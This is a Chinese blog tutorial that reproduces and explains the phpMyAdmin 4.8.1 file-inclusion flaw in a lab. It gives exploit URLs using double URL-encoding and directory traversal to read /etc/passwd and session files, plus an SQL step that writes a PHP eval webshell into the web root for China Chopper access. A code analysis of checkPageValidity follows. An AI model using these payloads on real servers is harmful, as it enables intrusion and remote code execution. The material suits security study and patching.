四十,phpMyAdmin 4.8.1后台文件包含漏洞复现及详解
yuyutoo 2024-10-13 00:42 7 浏览 0 评论
一.phpMyAdmin环境配置
PS:前面两部分内容会简单讲解phpMyAdmin 4.8.1版本配置过程,如果读者只想了解漏洞,可以从第三部分开始阅读。还请见谅~
phpMyAdmin是一种MySQL数据库的管理工具,安装该工具后,即可通过Web形式直接管理MySQL数据,而不需要通过执行系统命令来管理,非常适合对数据库操作命令不熟悉的数据库管理者,下面详细说明该工具的安装方法。
第一步,下载phpMyAdmin 4.8.1。
第二步,配置环境。
打开libraries目录下的config.default.php文件,依次找到下面各项,按照说明配置即可。
修改MySQL的用户名和密码,phpMyAdmin使用MySQL默认用户名root,密码设置为“123456”。
/**
* MySQL user
*
* @global string $cfg['Servers'][$i]['user']
*/
$cfg['Servers'][$i]['user'] = 'root';
/**
* MySQL password (only needed with 'config' auth_type)
*
* @global string $cfg['Servers'][$i]['password']
*/
$cfg['Servers'][$i]['password'] = '123456';
认证方法设置为“cookie”,登录phpMyAdmin时需要用户名和密码进行验证。在此有cookie、http、signon、config四种模式可供选择。
/**
* Authentication method (valid choices: config, http, signon or cookie)
*
* @global string $cfg['Servers'][$i]['auth_type']
*/
$cfg['Servers'][$i]['auth_type'] = 'cookie';
第三步,运行WAMP软件,并将WAMP中phpMyAdmin替换成4.8.1版本。
替换如下图所示:
运行Apache和MySQL如下图所示。
问题1: 当我们输入用户名“root”、密码“123456”时,很可能会报错“mysqli_real_connect(): (HY000/1045): Access denied for user ‘root’@‘localhost’ (using password: YES)”。提示是错误1045,告诉我们错误是由于没有访问权限,所以访问被拒绝了,主要原因就是由于该用户名所对应的密码错误。
第四步,检查配置文件中的主机、用户名和密码,并确认这些信息与 MySQL 服务器管理员所给出的信息一致。设置controluser和controlpass。
/**
* MySQL control user settings (this user must have read-only
* access to the "mysql/user" and "mysql/db" tables). The controluser is also
* used for all relational features (pmadb)
*
* @global string $cfg['Servers'][$i]['controluser']
*/
$cfg['Servers'][$i]['controluser'] = 'root';
/**
* MySQL control user settings (this user must have read-only
* access to the "mysql/user" and "mysql/db" tables). The controluser is also
* used for all relational features (pmadb)
*
* @global string $cfg['Servers'][$i]['controlpass']
*/
$cfg['Servers'][$i]['controlpass'] = '123456';
第五步,修改“config.sample.inc.php”(或config.inc.php)文件内容。
设置controluser和controlpass值。
修改如下:
$cfg['Servers'][$i]['controluser'] = 'root';
$cfg['Servers'][$i]['controlpass'] = '123456';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '123456';
第六步,接着登录phpMyAdmin,输入“root”和“123456”之后进入数据库管理主界面。
二.phpMyAdmin基础用法
接着我们使用phpMyAdmin搭建一个简单的网站试试。
第一步,创建数据库。
第二步,创建数据表 student,点击执行。
第三步,设置表的字段,包括:id、username、password。
第四步,查看我们创建好的数据表student。
第五步,插入数据并查询。
INSERT INTO `student`(`id`, `username`, `password`) VALUES ('1', 'yangxiuzhang','6666666');
INSERT INTO `student`(`id`, `username`, `password`) VALUES ('2', 'Eastmountain','123456');
此时数据显示如下图所示:
第六步,编写PHP代码将我们数据库中的内容显示出来。
访问地址:http://localhost:8088/20200110.php
<?php
echo('<h2>数据库测试</h2>');
//链接数据库
$con = mysqli_connect("localhost", "root", "123456", "eastmount");
if (!$con)
{
die('Could not connect database: ' . mysqli_error());
}
//设置查询结果编码
$con->set_charset('utf8');
//查询学生信息
$sql = "SELECT * FROM `student` ";
//得到查询结果
$result = $con->query($sql);
//遍历结果
while($row = $result->fetch_array()){
list($id,$username, $password) = $row;
echo $id.' ';
echo $username.' ';
echo $password;
echo '<br >';
}
//关闭连接
$con->close();
?>
显示结果如下图所示:
如果需要查看配置信息,这使用“phpinfo()”函数实现。
<?php
phpinfo();
?>
显示结果如下图所示,PHP的配置信息。
写到这里,我们的环境已经搭建成功,接下来我们开始讲解phpMyAdmin漏洞吧。可能很多博友会疑惑,为什么前面花费这么多时间讲解环境搭建了,两个原因吧!一方面作者是从零开始学习,通过环境搭建来复现该漏洞;另一方面照顾初学者,希望通过通俗易懂的步骤能实现文章的实验,也希望安全圈的大牛们别笑,哈哈~都是一点一滴成长起来的。
三.phpMyAdmin漏洞复现
原因:phpMyadmin 4.8.1版本的index.php中存在文件包含漏洞,通过二次编码可绕过过滤。
第一步,根据该版本CVE漏洞构造URL,在index.php后添加内容,如显示/etc/passwd详细内容。
/* 方法一 */
http://localhost:8088/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
/* 方法二 */
http://localhost:8088/phpmyadmin/index.php?target=db_datadict.php%253f/../../../../../../../../../Windows/DATE.ini
第二步,通过目录穿越包含任意文件。
第三步,执行SQL语句查询数据库路径。结果为:C:\xampp\mysql\data\。
show global variables like "%datadir%";
第四步,向数据库写入php代码。创建数据库rce和表rce,并插入php代码。
CREATE DATABASE rce;
use rce;
CREATE TABLE rce(code varchar(100));
INSERT INTO rce(code) VALUES("<?php phpinfo(); ?>");
输出结果如下图所示:
然后我们可以看到插入的php代码,如下所示。
第五步,在SQL中执行select ‘<?php phpinfo() ?>’,然后查看当前页面cookie中的phpmyadmin的值。
通过浏览器查看网络的Cookie值。
第六步,构建包含Session值的URL路径。
F12查看网站Session值,访问/index.php?target=db_sql.php%253f/…/…/…/…/…/…/tmp/sess_[session]。
?target=db_datadict.php%253f/../../../../../../../../../phpStudy/PHPTutorial/tmp/tmp/sess_imnnv91q886sfboa2sqos02b7njvho24
访问能显示如下图所示的信息:
第七步,在phpInfo默认页面找到网站的安装位置:/var/www/html,然后写入一句话木马。
select '<?php @eval($_POST[hcl]) ?>' into outfile '/var/www/html/hcl.php'
第八步,通过菜刀连接 http://ip/hcl.php。菜刀连接成功,在根目录下找到了key.txt文件,查看key.txt文件,获得key值。
简单总结:
利用phpMyAdmin 4.8.1后台文件包含漏洞,获取登录phpmyadmin系统所产生的sess_sessionID文件,然后通过文件绕过获取相关信息并植入木马,最终获取webshell。通常linux系统中存放路径为/tmp/sess_[当前会话session值]。
四.漏洞原理
在phpMyAdmin 4.8.1版本的index.php文件中,第50-63行代码如下:
$target_blacklist = array (
'import.php', 'export.php'
);
// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
&& is_string($_REQUEST['target'])
&& ! preg_match('/^index/', $_REQUEST['target'])
&& ! in_array($_REQUEST['target'], $target_blacklist)
&& Core::checkPageValidity($_REQUEST['target'])
) {
include $_REQUEST['target'];
exit;
}
它的含义是:
target传入不能为空
target必须是一个字符串
target不能以index开头
target不能在数组target_blacklist中
target经过checkPageValidit检查后为真
前面三个大家都容易理解,第四个判断是黑名单判断。在index.php中已经定义好了target_blacklist的值,它们是import.php和export.php,只要不等于这两个值就可以。
再看第五个判断,Core::checkPageValidity($_REQUEST[‘target’]为真,通过全局搜索发现了代码在libraries\classes\Core.php文件的第443-476行。
public static function checkPageValidity(&$page, array $whitelist = [])
{
if (empty($whitelist)) {
$whitelist = self::$goto_whitelist;
}
if (! isset($page) || !is_string($page)) {
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
return false;
}
在checkPageValidit中有两个形参,第一个是传入的target,第二个whitelist则有默认形参,也就是空的数组。进入函数首先会判断whitelist是否为空,如果为空则将定义的goto_whitelist赋值给whitelist(因为确实为空,我们只传进去一个target)。接着我们来看看goto_whitelist的代码。
public static $goto_whitelist = array(
'db_datadict.php',
'db_sql.php',
'db_events.php',
'db_export.php',
'db_importdocsql.php',
'db_multi_table_query.php',
'db_structure.php',
'db_import.php',
'db_operations.php',
'db_search.php',
'db_routines.php',
'export.php',
'import.php',
'index.php',
'pdf_pages.php',
'pdf_schema.php',
'server_binlog.php',
'server_collations.php',
'server_databases.php',
'server_engines.php',
'server_export.php',
'server_import.php',
'server_privileges.php',
'server_sql.php',
'server_status.php',
'server_status_advisor.php',
'server_status_monitor.php',
'server_status_queries.php',
'server_status_variables.php',
'server_variables.php',
'sql.php',
'tbl_addfield.php',
'tbl_change.php',
'tbl_create.php',
'tbl_import.php',
'tbl_indexes.php',
'tbl_sql.php',
'tbl_export.php',
'tbl_operations.php',
'tbl_structure.php',
'tbl_relation.php',
'tbl_replace.php',
'tbl_row_action.php',
'tbl_select.php',
'tbl_zoom_select.php',
'transformation_overview.php',
'transformation_wrapper.php',
'user_password.php',
);
接着分析代码,如果page在白名单中就会直接return true,但这里考虑到了可能带参数的情况,所以有了下面的判断。
下图的代码中,mb_strpos函数是查找string在另一个string中首次出现的位置。_page变量是获取page问号前的内容,是考虑到target有参数的情况,只要_page在白名单中就直接return true。但还考虑了url编码的情况,所以如果这步判断未成功,下一步又进行url解码。
当传入二次编码后的内容,会让checkPageValidity()这个函数返回true,但index中实际包含的内容却不是白名单中的文件。
例如:传入“?target=db_datadict.php%253f ”,由于服务器会自动解码一次,所以在checkPageValidity()中,page的值一开始会是“db_datadict.php%3f”,又一次url解码后变成了“db_datadict.php?”,这时符合了?前内容在白名单的要求,函数返回true。
但在index.php中_REQUEST[‘target’]仍然是“db_datadict.php%3f”,而且会被include,通过目录穿越,就可造成任意文件包含。最终通过该漏洞实现了上述攻击,这个漏洞也很快被修复并发布新版本。
五.总结
写到这里,这篇基础性文章就此结束,希望文章对您有所帮助。本文利用phpMyAdmin 4.8.1后台文件包含漏洞,获取登录phpmyadmin系统所产生的sess_sessionID文件,然后通过文件绕过获取相关信息并植入木马,最终获取webshell。同时,此漏洞是登陆后才可以使用的,比较鸡肋。一般登陆后直接执行SQL语句生成shell即可,但有时目录权限比较严格,不能在WEB目录内生成,则可以结合本例使用。
相关推荐
- 建筑福利-pdf转dwg格式转换器,再也不用描图-极客青年
-
作为一名经常熬夜画图的建筑狗或者cad用户,你体验过pdf图纸描图到cad吗?前几天一个老同学找我,说他的毕业设计需要我帮忙,发给我一份pdf图纸文件,问我怎么把pdf图纸转换成dwg格式。机智的我灵...
- 想学 HTML,不知从何入手?看完这篇文章你就知道了
-
很多人都说HTML是一门很简单的语言,看看书,看看视频就能读懂。但是,如果你完全没有接触过,就想通过看一遍教程,背背标签,想要完全了解HTML,真的有点太天真了。HTML中文...
- 「前端」HTML之结构
-
今天继续为大家分享前端的知识,如果对前端比较感兴趣的小伙伴,可以关注我,我会更大家继续分享更多与前端相关的内容,当然如果内容中又不当的或者文字错误的,欢迎大家在评论区留言,我会及时修改纠正。1.初识H...
- 手把手教你使用Python网络爬虫下载一本小说(附源码)
-
大家好,我是Python进阶者。前言前几天【磐奚鸟】大佬在群里分享了一个抓取小说的代码,感觉还是蛮不错的,这里分享给大家学习。...
- 用于处理pdf文件格式的转换器
-
在上传过程中如果单个文件太大则容易中断,而且文件太大的话对与存储也有些弊端。那么我们应该想到将文件进行压缩(注意这里压缩指的是不改变文件格式的压缩,而不是用变成压缩文件。这里就将以下用专门的软件压缩P...
- 乐书:在线 Kindle 电子书制作和转换工具
-
之前Kindle伴侣曾推荐过可以在Windows和Mac系统平台上运行的kindle电子书制作软件Sigil(教程),用它可以制作出高质量的的ePub格式电子书,当然最后还需要通...
- 付费文档怎么下载?教你5种方法,任意下载全网资源
-
网上查资料的时候,经常遇到需要注册登录或者付费的才能复制或者是下载,遇到这种情况大多数人都会选择重新查。...
- 捡来的知识!3种方法随便复制网页内容,白嫖真香呀
-
网上的资源真的多,所以许多人常常会从网上找资料。我们看到感兴趣的内容,第一时间可能会想要收入囊中。比如说截个图啊,或者挑选有意思的句子复制粘贴,记录下来。可是,有些时候,却会遇到这样的情况:1、内容不...
- AI的使用,生成HTML网页。
-
利用deepseek,豆包,kimi以及通义千问,写入相同的需求。【写一个网页,实现抽奖功能,点击“开始”,按键显示“停止”,姓名开始显示在屏幕上,人员包括:“张三”,“里斯”,“Bool”,“流水废...
- pdf转换成jpg转换器 4.1 官方正式版
-
pdf转换成jpg工具软件简介pdf转换成jpg转换器是一款界面简洁,操作方便的pdf转换成jpg转换器。pdf转换成jpg转换器可以将PDF文档转换为JPG,BMP,GIF,PNG,TIF图片文件。...
- 办公必备的office转换成pdf转换器怎么用?
-
2016-02-2415:53:37南方报道网评论(我要点评)字体刚从校园走出社会,对于快节奏的办公环境,难免会觉得有些吃力。在起步阶段力求将手头上的事情按时完工不出错,但是渐渐的你会发现,别人只...
- 为什么PDF转Word大多要收费?
-
PDF转Word大多都要收费?并非主要是因为技术上的难度,而是基于多方面的商业和版权考虑的,下面给大家浅分析下原因:...
- 如何用python生成简单的html report报告
-
前提:用python写了一个简单的log分析,主要也就是查询一些key,value出来,后面也可以根据需求增加。查询出来后,为了好看,搞个html表格来显示。需要的组件:jinja2flask...
- 学用系列|如何搞定word批量替换修改和格式转换?这里一站搞定
-
想必不少朋友都会碰到批量修改word文档内容、压缩文档图片、文件格式转换等重复性文档处理工作的需要,今天胖胖老师就推荐给大家一个免费工具XCLWinKits,一站搞定你所有的需要。什么是XCLWinK...
- 这款PDF文档转换神器,能帮你解决PDF使用中的许多难点
-
不管是平时的学习还是工作,相信许多朋友都经常接触PDF文件。可以说,PDF文件在我们的日常办公学习过程中的重要性和Word文档一样重要。在之前的更新中,小编介绍了几款非常不错的PDF文档格式转换软件,...
你 发表评论:
欢迎- 一周热门
-
-
前端面试:iframe 的优缺点? iframe有那些缺点
-
带斜线的表头制作好了,如何填充内容?这几种方法你更喜欢哪个?
-
漫学笔记之PHP.ini常用的配置信息
-
其实模版网站在开发工作中很重要,推荐几个参考站给大家
-
推荐7个模板代码和其他游戏源码下载的网址
-
[干货] JAVA - JVM - 2 内存两分 [干货]+java+-+jvm+-+2+内存两分吗
-
正在学习使用python搭建自动化测试框架?这个系统包你可能会用到
-
织梦(Dedecms)建站教程 织梦建站详细步骤
-
【开源分享】2024PHP在线客服系统源码(搭建教程+终身使用)
-
2024PHP在线客服系统源码+完全开源 带详细搭建教程
-
- 最近发表
- 标签列表
-
- mybatis plus (70)
- scheduledtask (71)
- css滚动条 (60)
- java学生成绩管理系统 (59)
- 结构体数组 (69)
- databasemetadata (64)
- javastatic (68)
- jsp实用教程 (53)
- fontawesome (57)
- widget开发 (57)
- vb net教程 (62)
- hibernate 教程 (63)
- case语句 (57)
- svn连接 (74)
- directoryindex (69)
- session timeout (58)
- textbox换行 (67)
- extension_dir (64)
- linearlayout (58)
- vba高级教程 (75)
- iframe用法 (58)
- sqlparameter (59)
- trim函数 (59)
- flex布局 (63)
- contextloaderlistener (56)